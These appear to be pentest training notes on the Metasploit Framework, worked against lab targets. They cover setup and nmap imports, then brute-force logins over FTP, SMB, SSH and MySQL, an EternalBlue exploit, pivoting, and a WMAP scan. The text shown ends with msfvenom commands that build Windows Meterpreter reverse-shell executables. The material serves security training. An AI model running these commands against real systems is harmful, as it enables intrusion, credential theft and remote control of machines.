The Metasploit Framework (MSF)

Previous🔬Tshark, ARP, WiFi Next🔬HFS - MSF Exploit

Last updated 1 year ago

Was this helpful?

⚡ Prerequisites
Basic familiarity with Linux & Windows
Basic familiarity with TCP & UDP protocols
📕 Learning Objectives
Understand, install, configure and use Metasploit Framework
Perform info-gathering, enumeration, exploitation, post exploitation with Metasploit
🔬 Training list - PentesterAcademy/INE Labs
subscription required

MSF Introduction

🗒️ The (MSF) is an open-source pentesting and exploit development platform, used to write, test and execute exploit code.

Provides automation of the penetration testing life cycle (specially exploitation and post-exploitation)
Used to develop and test exploits
Has a world database and public tested exploits
It is modular, new modules can be added and integrated
It is
Founded by H.D. Moore in 2003 (developed in Perl), Written in Ruby in 2007, acquired by in 2009, released as Metasploit v6.0 in 2020
Metasploit Framework is the Community Edition
Metasploit Pro & Express are Commercial versions

📌 Check the

Terminology

Term

Description

Interface

Methods of interacting with the Metasploit Framework (msfconsole, Metasploit cmd)

Module

Pieces of code that perform a particular task (an exploit)

Vulnerability

Exploitable flaw or weakness in a computer system or network

Exploit

Code/Module used to take advantage of a vulnerability

Payload

Piece of code delivered to the target by an exploit (execute arbitrary commands or provide remote access)

Listener

Utility that listens for an incoming connection from a target

📌 Exploit is launched (takes advantage of the vulnerability) ➡️ Payload dropped (executes a reverse shell command) ➡️ Connects back to the Listener

Interfaces

🗒️ Metasploit Framework Console () - an all in one interface that provides with access to all the functionality of the MSF.

🗒️ Metasploit Framework Command Line Interface () - a command line utility used to facilitate the creation of automation scripts that utilize Metasploit modules.

Discontinued in 2015, MSFconsole can be used with the same functionality of redirecting output from other tools into msfcli and vice versa.

🗒️ Metasploit Community Edition GUI - a web based GUI front-end of the MSF.

🗒️ - a free Java based GUI front-end cyber attack management tool for the MSF.

Visualizes targets and simplifies network discovery
Recommends exploits
Exposes the advanced capabilities of the MSF

🗒️ A module is the piece of code that can be utilized and executed by the MSF.

The MSF libraries (Rex, Core, Base) allow to extend and initiate functionality, facilitating the execution of modules without having to write additional code.

MSF Module

Description

Exploit

Used to take advantage of a vulnerability, usually paired with a payload

Payload

Code delivered and remotely executed on the target after successful exploitation - e.g. a reverse shell that initiates a connection

Encoder

Used to encode payloads in order to avoid Anti Virus detection - e.g. encoding scheme

NOPS

Keep the payload sizes consistent across exploit attempts and ensure the stability of a payload on the target system

Auxiliary

Is not paired with a payload, used to perform additional functionality - e.g. port scanners, fuzzers, sniffers, etc

Payloads are created at runtime from various components. Depending on the target system and infrastructure, there are two types of payloads that can be used:

Non-Staged Payload - sent to the target system as is, along with the exploit
Staged Payload - sent to the target in two parts:
- the stager (first part) establish a stable communication channel between the attacker and target. It contains a payload, the stage, that initiates a reverse connection back to the attacker
- the stage (second part) is downloaded by the stager and executed
  - executes arbitrary commands on the target
  - provides a reverse shell or Meterpreter session

🗒️ The is an advanced multi-functional payload executed by in memory DLL injection stagers on the target system.

Communicates over the stager socket
Provides an interactive command interpreter on the target system

ls /usr/share/metasploit-framework

MSF filesystem is intuitive and organized by directories.
Modules are stored under:
- /usr/share/metasploit-framework/modules/
- ~/.msf4/modules - user specified modules

Pentesting with MSF

🗒️ (Penetration Testing Execution Standard) is a methodology that contains 7 main sections, defined by the standard as a comprehensive basis for penetration testing execution.

can be adopted as a roadmap for Metasploit integration and understanding of the phases of a penetration test.

The various phases involved in a typical pentest should be:
📌 Pre-Engagement Interactions
⬇️
📌 Information Gathering
⬇️
📌 Enumeration
Threat Modeling
Vulnerability Analysis
⬇️
📌 Exploitation
Identify Vulnerable Services
Prepare Exploit Code
Gaining Access
Bypass AV detection
Pivoting
⬇️
📌 Post Exploitation
Privilege Escalation
Maintaining Persistent Access
Clearing Tracks
⬇️
📌 Reporting

Pentesting Phase

MSF Implementation

Information Gathering & Enumeration

Auxiliary Modules, nmap reports

Vulnerability Scanning

Auxiliary Modules, nessus reports

Exploitation

Exploit Modules & Payloads

Post Exploitation

Meterpreter

Privilege Escalation

Post Exploitation Modules, Meterpreter

Maintaining Persistent Access

Post Exploitation Modules, Persistence

Metasploit Fundamentals

🗒️ The Metasploit Framework Database (msfdb) contains all the data used with MSF like assessments and scans data, etc.

Uses PostgreSQL as the primary database - postgresql service must be running
Facilitates the import and storage of scan results (from Nmap, Nessus, other tools)

Use APT package manager on Kali Linux (or on Debian-based distros)

sudo apt update && sudo apt install metasploit-framework -y

Enable postgresql at boot, start the service and initialize MSF database

sudo systemctl enable postgresql
sudo systemctl restart postgresql
sudo msfdb init

Run msfconsole to start the Metasploit Framework Console

msfconsole

Check the db connection is on in the msfconsole

db_status

📌 Check this article by StationX ➡️ which will cover:
Deploying a Kali Linux virtual machine with Metasploit pre-installed
Setting up a target in a virtual lab, Metasploitable3, with Vagrant
A sample walkthrough against a vulnerable MySQL Server
Frequently Asked Questions (FAQ)

🗒️ The Metasploit Framework Console (msfconsole) is an all-in-one interface and centralized console that allows access to all of the MSF options and features.

It is launched by running the msfconsole command

msfconsole

Run it in quiet mode without the banner with

msfconsole -q

Module Variables

An MSF module requires additional information that can be configured through the use of MSF variables, both local or global variables, called options inside the msfconsole.

Variables e.g. (they are based on the selected module):

LHOST - attacker's IP address
LPORT - attacker's port number (receive reverse connection)
RHOST - target's IP address
RHOSTS - multiple targets/networks IP addresses
RPORT - target port number

Useful Commands

Run msfconsole and check these useful commands:

help
version

show -h
show all
show exploits

search <STRING>
use <MODULE_NAME>
set <OPTION>
run
execute # same as run

sessions
connect

Port Scan Example

search portscan
use auxiliary/scanner/portscan/tcp
show options
set RHOSTS <TARGET_IP>
set PORTS 1-1000
run
# CTRL+C to cancel the running process
back

CVE Exploits Example

search cve:2017 type:exploit platform:windows

Payload Options Example

search eternalblue
use 0
# specify the identifier
set payload <PAYLOAD_NAME>
set RHOSTS <TARGET_IP>
run
# or
exploit

🗒️ Metasploit Workspaces allows to manage and organize the hosts, data, scans and activities stored in the msfdb.

Import, manipulate, export data
Create, manage, switch between workspaces
Sort and organize the assessments of the penetration test

📌 It's recommended to create a new workspace for each engagement.

msfconsole -q
db_status
	[*] Connected to msf. Connection type: postgresql.

workspace -h

workspace
# current working workspace
	* default

Create a new workspace

workspace -a Test

Change workspace

workspace <WORKSPACE_NAME>

workspace -a INE

Delete a workspace

workspace -d Test

Information Gathering & Enumeration with MSF

The Metasploit Framework allows to import nmap results.

Nmap Enumeration

nmap enumeration results (service versions, operating systems, etc) can be exported into a file that can be imported into MSF and used for further detection and exploitation.

🔬 Check the full nmap information gathering lab in (at the end of the page).

Some commands:

nmap <TARGET_IP>
nmap -Pn <TARGET_IP>
nmap -Pn -sV -O <TARGET_IP>

Output the nmap scan results into an .XML format file that can be imported into MSF

nmap -Pn -sV -O 10.2.18.161 -oX windows_server_2012

In the same lab environment from above, use msfconsole to import the results into MSF with the db_import command

service postgresql start
msfconsole

Inside msfconsole

db_status
workspace -a Win2k12

db_import /root/windows_server_2012

[*] Importing 'Nmap XML' data
[*] Import: Parsing with 'Nokogiri v1.10.7'
[*] Importing host 10.2.18.161
[*] Successfully imported /root/windows_server_2012

hosts
services
vulns
loot
creds
notes

Perform an nmap scan within the MSF Console and import the results in a dedicated workspace

workspace -a nmap_MSF

db_nmap -Pn -sV -O <TARGET_IP>

MSF Auxiliary modules are used during the information gathering (similar to nmap) and the post exploitation phases of the pentest.

perform TCP/UDP port scanning
enumerate services
discover hosts on different network subnets (post-exploitation phase)

Lab Network Service Scanning

🔬 Lab

service postgresql start && msfconsole -q

workspace -a Port_scan
search portscan
use auxiliary/scanner/portscan/tcp
set RHOSTS 192.41.167.3
run

curl 192.41.167.3

Exploitation

search xoda
use exploit/unix/webapp/xoda_file_upload
set RHOSTS 192.41.167.3
set TARGETURI /
run

Perform a network scan on the second target

meterpreter > shell

/bin/bash -i
ifconfig
# 192.26.158.2 Local Lan subnet IP
exit

Add the route within meterpreter and background the meterpreter session

run autoroute -s 192.26.158.2
background

search portscan
use auxiliary/scanner/portscan/tcp
set RHOSTS 192.26.158.3
run

# the port scan will be performed through the first target system using the route
[+] 192.26.158.3: - 192.26.158.3:22 - TCP OPEN
[+] 192.26.158.3: - 192.26.158.3:21 - TCP OPEN
[+] 192.26.158.3: - 192.26.158.3:80 - TCP OPEN

Upload and run nmap against the second target, from the first target machine

sessions 1
upload /root/tools/static-binaries/nmap /tmp/nmap
shell

/bin/bash -i
cd /tmp
chmod +x ./nmap
./nmap -p- 192.26.158.3

21/tcp open  ftp
22/tcp open  ssh
80/tcp open  http

📌 There are 3 running services on the second target machine.

UDP Scan

Into msfconsole

search udp_sweep
use auxiliary/scanner/discovery/udp_sweep
set RHOSTS 192.41.167.3
run

📌🔬 Check the for basic nmap enumeration.

Next, there are some MSF commands and modules for service enumeration on the same labs from the Enumeration Section.

Auxiliary modules can be used for enumeration, brute-force attacks, etc

❗📝 On every attacker machine, run this command to start msfconsole:

service postgresql start && msfconsole -q

Setup a global variable. This will set the RHOSTS option for all the modules utilized:

setg RHOSTS <TARGET_IP>

auxiliary/scanner/ftp/ftp_version

ip -br -c a
workspace -a FTP_ENUM
search portscan
use auxiliary/scanner/portscan/tcp
set RHOSTS 192.146.175.3
run

[+] 192.146.175.3: - 192.146.175.3:21 - TCP OPEN

back
search type:auxiliary name:ftp
use auxiliary/scanner/ftp/ftp_version
set RHOSTS 192.146.175.3
run

[+] 192.146.175.3:21 - FTP Banner: '220 ProFTPD 1.3.5a Server (AttackDefense-FTP) [::ffff:192.146.175.3]\x0d\x0a'

search ProFTPD

auxiliary/scanner/ftp/ftp_login

back
search type:auxiliary name:ftp
use auxiliary/scanner/ftp/ftp_login
show options
set RHOSTS 192.146.175.3
set USER_FILE /usr/share/metasploit-framework/data/wordlists/common_users.txt
set PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
run

[+] 192.146.175.3:21 - 192.146.175.3:21 - Login Successful: sysadmin:654321

auxiliary/scanner/ftp/anonymous

back
search type:auxiliary name:ftp
use auxiliary/scanner/ftp/anonymous
set RHOSTS 192.146.175.3
run

auxiliary/scanner/smb/smb_version

ip -br -c a
setg RHOSTS 192.132.155.3
workspace -a SMB_ENUM
search type:auxiliary name:smb
use auxiliary/scanner/smb/smb_version
options
run

[*] 192.132.155.3:445 - Host could not be identified: Windows 6.1 (Samba 4.3.11-Ubuntu)

auxiliary/scanner/smb/smb_enumusers

back
search type:auxiliary name:smb
use auxiliary/scanner/smb/smb_enumusers
info
run

[+] 192.132.155.3:139 - SAMBA-RECON [ john, elie, aisha, shawn, emma, admin ] ( LockoutTries=0 PasswordMin=5 )

auxiliary/scanner/smb/smb_enumshares

back
search type:auxiliary name:smb
use auxiliary/scanner/smb/smb_enumshares
set ShowFiles true
run

[+] 192.132.155.3:139 - public - (DS) 
[+] 192.132.155.3:139 - john - (DS) 
[+] 192.132.155.3:139 - aisha - (DS) 
[+] 192.132.155.3:139 - emma - (DS) 
[+] 192.132.155.3:139 - everyone - (DS) 
[+] 192.132.155.3:139 - IPC$ - (I) IPC Service (samba.recon.lab)

back
search smb_login
use auxiliary/scanner/smb/smb_login
options
set SMBUser admin
set PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
run

[+] 192.132.155.3:445 - 192.132.155.3:445 - Success: '.\admin:password'

🔬

Remember to specify the correct port and if targeting a web server with SSL enabled, in the options.

ip -br -c a
setg RHOSTS 192.106.226.3
setg RHOST 192.106.226.3
workspace -a HTTP_ENUM

auxiliary/scanner/http/apache_userdir_enum

search apache_userdir_enum
use auxiliary/scanner/http/apache_userdir_enum
options
info
set USER_FILE /usr/share/metasploit-framework/data/wordlists/common_users.txt
run

[+] http://192.106.226.3/ - Users found: rooty

auxiliary/scanner/http/brute_dirs

auxiliary/scanner/http/dir_scanner

search dir_scanner
use auxiliary/scanner/http/dir_scanner
options
run

auxiliary/scanner/http/dir_listing

auxiliary/scanner/http/http_put

[+] Found http://192.106.226.3:80/cgi-bin/ 404 (192.106.226.3)
[+] Found http://192.106.226.3:80/data/ 404 (192.106.226.3)
[+] Found http://192.106.226.3:80/doc/ 404 (192.106.226.3)
[+] Found http://192.106.226.3:80/downloads/ 404 (192.106.226.3)
[+] Found http://192.106.226.3:80/icons/ 404 (192.106.226.3)
[+] Found http://192.106.226.3:80/manual/ 404 (192.106.226.3)
[+] Found http://192.106.226.3:80/secure/ 404 (192.106.226.3)
[+] Found http://192.106.226.3:80/users/ 404 (192.106.226.3)
[+] Found http://192.106.226.3:80/uploads/ 404 (192.106.226.3)
[+] Found http://192.106.226.3:80/web_app/ 404 (192.106.226.3)
[+] Found http://192.106.226.3:80/view/ 404 (192.106.226.3)
[+] Found http://192.106.226.3:80/webadmin/ 404 (192.106.226.3)
[+] Found http://192.106.226.3:80/webmail/ 404 (192.106.226.3)
[+] Found http://192.106.226.3:80/webdb/ 404 (192.106.226.3)
[+] Found http://192.106.226.3:80/webdav/ 404 (192.106.226.3)
[+] Found http://192.106.226.3:80/~admin/ 404 (192.106.226.3)
[+] Found http://192.106.226.3:80/~nobody/ 404 (192.106.226.3)

auxiliary/scanner/http/files_dir

search files_dir
use auxiliary/scanner/http/files_dir
options
set DICTIONARY /usr/share/metasploit-framework/data/wmap/wmap_files.txt
run

[+] Found http://192.106.226.3:80/file.backup 200
[*] Using code '404' as not found for files with extension .bak
[*] Using code '404' as not found for files with extension .c
[+] Found http://192.106.226.3:80/code.c 200
[*] Using code '404' as not found for files with extension .cfg
[+] Found http://192.106.226.3:80/code.cfg 200
[*] Using code '404' as not found for files with extension .class
[...]
[*] Using code '404' as not found for files with extension .html
[+] Found http://192.106.226.3:80/index.html 200
[*] Using code '404' as not found for files with extension .htm
[...]
[+] Found http://192.106.226.3:80/test.php 200
[*] Using code '404' as not found for files with extension .tar
[...]

auxiliary/scanner/http/http_login

search http_login
use auxiliary/scanner/http/http_login
options
set AUTH_URI /secure/
unset USERPASS_FILE
echo "rooty" > user.txt
set USER_FILE /root/user.txt
set PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
set VERBOSE false
run

auxiliary/scanner/http/http_header

search http_header
use auxiliary/scanner/http/http_header
options
run

[+] 192.106.226.3:80 : CONTENT-TYPE: text/html
[+] 192.106.226.3:80 : LAST-MODIFIED: Wed, 27 Feb 2019 04:21:01 GMT
[+] 192.106.226.3:80 : SERVER: Apache/2.4.18 (Ubuntu)
[+] 192.106.226.3:80 : detected 3 headers

auxiliary/scanner/http/http_version

search type:auxiliary name:http
use auxiliary/scanner/http/http_version
options
run
# in case of HTTPS website, set RPORT=443 and SSL="true"

[+] 192.106.226.3:80 Apache/2.4.18 (Ubuntu)

auxiliary/scanner/http/robots_txt

search robots_txt
use auxiliary/scanner/http/robots_txt
options
run

[+] Contents of Robots.txt:
# robots.txt for attackdefense 
User-agent: test                     
# Directories
Allow: /webmail
User-agent: *
# Directories
Disallow: /data
Disallow: /secure

curl http://192.106.226.3/data/
curl http://192.106.226.3/secure/

🔬

ip -br -c a
setg RHOSTS 192.64.22.3
setg RHOST 192.64.22.3
workspace -a MYSQL_ENUM

auxiliary/admin/mysql/mysql_enum

search mysql_enum
use auxiliary/admin/mysql/mysql_enum
info
set USERNAME root
set PASSWORD twinkle
run

[*] 192.64.22.3:3306 - Running MySQL Enumerator...
[*] 192.64.22.3:3306 - Enumerating Parameters
[*] 192.64.22.3:3306 -  MySQL Version: 5.5.61-0ubuntu0.14.04.1
[*] 192.64.22.3:3306 -  Compiled for the following OS: debian-linux-gnu
[*] 192.64.22.3:3306 -  Architecture: x86_64
[*] 192.64.22.3:3306 -  Server Hostname: victim-1
[*] 192.64.22.3:3306 -  Data Directory: /var/lib/mysql/
[*] 192.64.22.3:3306 -  Logging of queries and logins: OFF
[*] 192.64.22.3:3306 -  Old Password Hashing Algorithm OFF
[*] 192.64.22.3:3306 -  Loading of local files: ON
[*] 192.64.22.3:3306 -  Deny logins with old Pre-4.1 Passwords: OFF
[*] 192.64.22.3:3306 -  Allow Use of symlinks for Database Files: YES
[*] 192.64.22.3:3306 -  Allow Table Merge: 
[*] 192.64.22.3:3306 -  SSL Connection: DISABLED
[*] 192.64.22.3:3306 - Enumerating Accounts:
[*] 192.64.22.3:3306 -  List of Accounts with Password Hashes:
[+] 192.64.22.3:3306 -          User: root Host: localhost Password Hash: *A0E23B565BACCE3E70D223915ABF2554B2540144
[+] 192.64.22.3:3306 -          User: root Host: 891b50fafb0f Password Hash: 
[+] 192.64.22.3:3306 -          User: root Host: 127.0.0.1 Password Hash: 
[+] 192.64.22.3:3306 -          User: root Host: ::1 Password Hash: 
[+] 192.64.22.3:3306 -          User: debian-sys-maint Host: localhost Password Hash: *F4E71A0BE028B3688230B992EEAC70BC598FA723
[+] 192.64.22.3:3306 -          User: root Host: % Password Hash: *A0E23B565BACCE3E70D223915ABF2554B2540144
[+] 192.64.22.3:3306 -          User: filetest Host: % Password Hash: *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
[+] 192.64.22.3:3306 -          User: ultra Host: localhost Password Hash: *94BDCEBE19083CE2A1F959FD02F964C7AF4CFC29
[+] 192.64.22.3:3306 -          User: guest Host: localhost Password Hash: *17FD2DDCC01E0E66405FB1BA16F033188D18F646
[+] 192.64.22.3:3306 -          User: gopher Host: localhost Password Hash: *027ADC92DD1A83351C64ABCD8BD4BA16EEDA0AB0
[+] 192.64.22.3:3306 -          User: backup Host: localhost Password Hash: *E6DEAD2645D88071D28F004A209691AC60A72AC9
[+] 192.64.22.3:3306 -          User: sysadmin Host: localhost Password Hash: *78A1258090DAA81738418E11B73EB494596DFDD3
[*] 192.64.22.3:3306 -  The following users have GRANT Privilege:
[...]

auxiliary/admin/mysql/mysql_sql

search mysql_sql
use auxiliary/admin/mysql/mysql_sql
options
set USERNAME root
set PASSWORD twinkle
run
# set an SQL query
set SQL show databases;
run

[*] 192.64.22.3:3306 - Sending statement: 'select version()'...
[*] 192.64.22.3:3306 -  | 5.5.61-0ubuntu0.14.04.1 |

[*] 192.64.22.3:3306 - Sending statement: 'show databases;'...
[*] 192.64.22.3:3306 -  | information_schema |
[*] 192.64.22.3:3306 -  | mysql |
[*] 192.64.22.3:3306 -  | performance_schema |
[*] 192.64.22.3:3306 -  | upload |
[*] 192.64.22.3:3306 -  | vendors |
[*] 192.64.22.3:3306 -  | videos |
[*] 192.64.22.3:3306 -  | warehouse |

auxiliary/scanner/mysql/mysql_file_enum

auxiliary/scanner/mysql/mysql_hashdump

auxiliary/scanner/mysql/mysql_login

search mysql_login
use auxiliary/scanner/mysql/mysql_login
options
set USERNAME root
set PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
set VERBOSE false
set STOP_ON_SUCCESS false
run

[+] 192.64.22.3:3306 - 192.64.22.3:3306 - Success: 'root:twinkle'

auxiliary/scanner/mysql/mysql_schemadump

search mysql_schemadump
use auxiliary/scanner/mysql/mysql_schemadump
options
set USERNAME root
set PASSWORD twinkle
run

[+] 192.64.22.3:3306 - Schema stored in:
/root/.msf4/loot/20230413112948_MYSQL_ENUM_192.64.22.3_mysql_schema_807923.txt
[+] 192.64.22.3:3306 - MySQL Server Schema
 Host: 192.64.22.3
 Port: 3306
 ====================
---
- DBName: upload
  Tables: []
- DBName: vendors
  Tables: []
- DBName: videos
  Tables: []
- DBName: warehouse
  Tables: []

auxiliary/scanner/mysql/mysql_version

search type:auxiliary name:mysql
use auxiliary/scanner/mysql/mysql_version
options
run

[+] 192.64.22.3:3306 - 192.64.22.3:3306 is running MySQL 5.5.61-0ubuntu0.14.04.1 (protocol 10)
# MySQL and Ubuntu versions enumerated!

auxiliary/scanner/mysql/mysql_writable_dirs

Check the MySQL Enumerated data within MSF:

hosts
services
loot
creds

🔬

ip -br -c a
setg RHOSTS 192.127.196.3
setg RHOST 192.127.196.3
workspace -a SSH_ENUM

auxiliary/scanner/ssh/ssh_version

search type:auxiliary name:ssh
use auxiliary/scanner/ssh/ssh_version
options
run

[+] 192.127.196.3:22 - SSH server version: SSH-2.0-OpenSSH_7.9p1 Ubuntu-10 ( service.version=7.9p1 openssh.comment=Ubuntu-10 service.vendor=OpenBSD service.family=OpenSSH service.product=OpenSSH service.cpe23=cpe:/a:openbsd:openssh:7.9p1 os.vendor=Ubuntu os.family=Linux os.product=Linux os.version=19.04 os.cpe23=cpe:/o:canonical:ubuntu_linux:19.04 service.protocol=ssh fingerprint_db=ssh.banner )
# SSH-2.0-OpenSSH_7.9p1 and Ubuntu 19.04

auxiliary/scanner/ssh/ssh_login

search ssh_login
use auxiliary/scanner/ssh/ssh_login
# for password authentication
options
set USER_FILE /usr/share/metasploit-framework/data/wordlists/common_users.txt
set PASS_FILE /usr/share/metasploit-framework/data/wordlists/common_passwords.txt
run

[+] 192.127.196.3:22 - Success: 'sysadmin:hailey' ''
[*] Command shell session 1 opened (192.127.196.2:37093 -> 192.127.196.3:22)
[+] 192.127.196.3:22 - Success: 'rooty:pineapple' ''
[*] Command shell session 2 opened (192.127.196.2:44935 -> 192.127.196.3:22)
[+] 192.127.196.3:22 - Success: 'demo:butterfly1' ''
[*] Command shell session 3 opened (192.127.196.2:39681 -> 192.127.196.3:22)
[+] 192.127.196.3:22 - Success: 'auditor:xbox360' ''
[*] Command shell session 4 opened (192.127.196.2:42273 -> 192.127.196.3:22)
[+] 192.127.196.3:22 - Success: 'anon:741852963' ''
[*] Command shell session 5 opened (192.127.196.2:44263 -> 192.127.196.3:22)
[+] 192.127.196.3:22 - Success: 'administrator:password1' ''
[*] Command shell session 6 opened (192.127.196.2:39997 -> 192.127.196.3:22)
[+] 192.127.196.3:22 - Success: 'diag:secret' ''

This module sets up SSH sessions

auxiliary/scanner/ssh/ssh_enumusers

search type:auxiliary name:ssh
use auxiliary/scanner/ssh/ssh_enumusers
options
set USER_FILE /usr/share/metasploit-framework/data/wordlists/common_users.txt
run

[+] 192.127.196.3:22 - SSH - User 'sysadmin' found
[+] 192.127.196.3:22 - SSH - User 'rooty' found
[+] 192.127.196.3:22 - SSH - User 'demo' found
[+] 192.127.196.3:22 - SSH - User 'auditor' found
[+] 192.127.196.3:22 - SSH - User 'anon' found
[+] 192.127.196.3:22 - SSH - User 'administrator' found
[+] 192.127.196.3:22 - SSH - User 'diag' found

🔬

ip -br -c a
setg RHOSTS 192.8.115.3
setg RHOST 192.8.115.3
workspace -a SMTP_ENUM
# Run a portscan to identify SMTP port, in this case is port 25

auxiliary/scanner/smtp/smtp_enum

search type:auxiliary name:smtp
use auxiliary/scanner/smtp/smtp_enum
options
run

[+] 192.63.243.3:25 - 192.63.243.3:25 Users found: , admin, administrator, backup, bin, daemon, games, gnats, irc, list, lp, mail, man, news, nobody, postmaster, proxy, sync, sys, uucp, www-data

auxiliary/scanner/smtp/smtp_version

search type:auxiliary name:smtp
use auxiliary/scanner/smtp/smtp_version
options
run

[+] 192.8.115.3:25 - 192.8.115.3:25 SMTP 220 openmailbox.xyz ESMTP Postfix: Welcome to our mail server.\x0d\x0a

Vulnerability Scanning With MSF

MSF Auxiliary and exploit modules can be utilized to identify inherent vulnerabilities in services, O.S. and web apps.

Useful in the Exploitation phase of the pentest

🔬 lab environment will be used for the vulnerability scanning demonstration.

Metasploitable3 is a vulnerable virtual machine developed by Rapid7, intended to be used as a vulnerable target for testing exploits with Metasploit.

🔬 You can find my lab installation & configuration with Vagrant at , set up for educational purposes.

Kali Linux attacker machine must be configured with the same local network of the Metasploitable3 VMs.

Detect active hosts on the local network, from the Kali VM:

sudo nmap -sn 192.168.31.0/24

Nmap scan report for 192.168.31.139 # Linux target
Nmap scan report for 192.168.31.140 # Windows2008 target

Run Metasploit:

service postgresql start && msfconsole -q

db_status
setg RHOSTS 192.168.31.140
setg RHOST 192.168.31.140
workspace -a VULN_SCAN_MS3

Service version is a key piece of information for the vulnerabilities scanning. Use the db_nmap command inside the MSF

db_nmap -sS -sV -O 192.168.31.140

[*] Nmap: 21/tcp    open  ftp Microsoft ftpd
[*] Nmap: 22/tcp    open  ssh OpenSSH 7.1 (protocol 2.0)
[*] Nmap: 80/tcp    open  http Microsoft IIS httpd 7.5
[*] Nmap: 135/tcp   open  msrpc Microsoft Windows RPC
[*] Nmap: 139/tcp   open  netbios-ssn Microsoft Windows netbios-ssn
[*] Nmap: 445/tcp   open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
[*] Nmap: 3306/tcp  open  mysql MySQL 5.5.20-log
[*] Nmap: 3389/tcp  open  tcpwrapped
[*] Nmap: 4848/tcp  open  ssl/http Oracle GlassFish 4.0 (Servlet 3.1; JSP 2.3; Java 1.8)
[*] Nmap: 7676/tcp  open  java-message-service Java Message Service 301
[*] Nmap: 8009/tcp  open  ajp13 Apache Jserv (Protocol v1.3)
[*] Nmap: 8080/tcp  open  http Oracle GlassFish 4.0 (Servlet 3.1; JSP 2.3; Java 1.8)
[*] Nmap: 8181/tcp  open  ssl/http Oracle GlassFish 4.0 (Servlet 3.1; JSP 2.3; Java 1.8)
[*] Nmap: 8383/tcp  open  http Apache httpd
[*] Nmap: 9200/tcp  open  wap-wsp?
[*] Nmap: 49152/tcp open  msrpc Microsoft Windows RPC
[*] Nmap: 49153/tcp open  msrpc Microsoft Windows RPC
[*] Nmap: 49154/tcp open  msrpc Microsoft Windows RPC
[*] Nmap: 49155/tcp open  msrpc Microsoft Windows RPC
[...]

hosts
services

Manually search for a specific exploit
- Check if there are any exploits for a particular version of a service

search type:exploit name:iis

search Sun GlassFish

Check if a module will work on the specific version of the service

use exploit/multi/http/glassfish_deployer
info

# Description:
#   This module logs in to a GlassFish Server (Open Source or
#   Commercial) using various methods (such as authentication bypass,
#   default credentials, or user-supplied login), and deploys a
#   malicious war file in order to get remote code execution. It has
#   been tested on Glassfish 2.x, 3.0, 4.0 and Sun Java System
#   Application Server 9.x. Newer GlassFish versions do not allow remote
#   access (Secure Admin) by default, but is required for exploitation.

set payload windows/meterpreter/reverse_tcp
options
# check the LHOST, LPORT, APP_RPORT, RPORT, PAYLOAD options

Use tool from the Kali terminal, instead of search MSF command, by displaying only the Metasploit exploit modules

searchsploit "Microsoft Windows SMB" | grep -e "Metasploit"

Back in msfconsole, check if the server is vulnerable to MS17-010

search eternalblue
use auxiliary/scanner/smb/smb_ms17_010
run

use exploit/windows/smb/ms17_010_eternalblue
options
# always check Payload options
run

- a Metasploit plugin for easy exploit & vulnerability attack.
takes a look at the Metasploit database and provides a list of exploit modules to use for the already enumerated services

On a Kali terminal

wget https://raw.githubusercontent.com/hahwul/metasploit-autopwn/master/db_autopwn.rb
sudo mv db_autopwn.rb /usr/share/metasploit-framework/plugins/

On msfconsole

load db_autopwn

db_autopwn -p -t
# Enumerates exploits for each of the open ports

db_autopwn -p -t -PI 445
# Limit to only the 445 port

On msfconsole use the analyze command to auto analyze the contents of the MSFdb (hosts & services)

analyze

vulns

VA with

🔬 You can find my .

A vulnerability scan with Nessus result can be imported into the MSF for analysis and exploitation.
Nessus Essentials free version allows to scan up to 16 IPs.

Start Nessus Essentials on the Kali VM, login and create a New Basic Network Scan and run it.

Wait for the scan conclusion and export the results with the Export/Nessus button.

Open the msfconsole terminal and import the Nessus results
- Check the information from the scan results with the hosts, services, vulns commands

workspace -a MS3_NESSUS
db_import /home/kali/Downloads/MS3_zph3t5.nessus
hosts
services
vulns

vulns -p 445

search cve:2017 name:smb
search MS12-020
search cve:2019 name:rdp
search cve:2015 name:ManageEngine
search PHP CGI Argument Injection

VA with

🗒️ WMAP is a web application vulnerability scanner that allows to conduct and automate web server enumeration and scanning from within the Metasploit Framework.

Available as a fully integrated MSF plugin
Utilizes the in-built MSF auxiliary modules

🔬 The lab is the same one from the HTTP Metasploit Enumeration section above -

ip -br -c a
	192.28.60.3
	# Target IP

service postgresql start && msfconsole -q

db_status
setg RHOSTS 192.28.60.3
setg RHOST 192.28.60.3
workspace -a WMAP_SCAN

Load WMAP extension within msfconsole

load wmap

Add WMAP site

wmap_sites -a 192.28.60.3

Specify the target URL

wmap_targets -t http://192.28.60.3

wmap_sites -l
wmap_targets -l

Show only the MSF modules that will be able to be run against target

wmap_run -t

Run the web app vulnerability scan
- this will run all enabled modules against the target web server

wmap_run -e

Analyze the results produced by WMAP.

List WMAP found vulnerabilities

wmap_vulns -l

Since the allowed methods are POST, OPTIONS, GET, HEAD, exploit the vulnerability with the use of auxiliary/scanner/http/http_put module to upload a file into the /data directory
- 📌 A reverse shell payload can be uploaded and run on the target.

use auxiliary/scanner/http/http_put
options
set PATH /data/
set FILEDATA "File uploaded"
set FILENAME file.txt
run

Test if the file has been uploaded correctly

curl http://192.28.60.3:80/data/file.txt

with MSF

A client-side attack is a security breach that happens on the client side.

Social engineering techniques take advantage of human vulnerabilities
Require user-interaction to open malicious documents or portable executables (PEs)
The payload is stored on the client's system
Attackers have to pay attention to Anti Virus detection

❗ Advanced modern antivirus solutions detects and blocks this type of payloads very easily.

Payloads

- a Metasploit standalone payload generator and encoder
e.g. - generate a malicious meterpreter payload, transfer it to a client target; once executed it will connect back to the payload handler and provides with remote access

List available payloads

msfvenom --list payloads

When generating a payload the exact name of the payload must be specified
- target operating system
- target O.S. architecture (x64, x86 ...)
- payload type
- protocol used to connect back (depends on requirements)

e.g. of Staged payload

windows/x64/meterpreter/reverse_tcp

e.g. of Non-Staged payload

windows/x64/meterpreter_reverse_https

Generate a Windows payload with msfvenom

32bit payload:

msfvenom -a x86 -p windows/meterpreter/reverse_tcp LHOST=192.168.31.128 LPORT=1234 -f exe > /home/kali/certs/ejpt/Windows_Payloads/payloadx86.exe

# LHOST = Attacker IP address

64bit payload:

msfvenom -a x64 -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.31.128 LPORT=1234 -f exe > /home/kali/certs/ejpt/Windows_Payloads/payloadx64.exe

List the output formats available

msfvenom --list formats

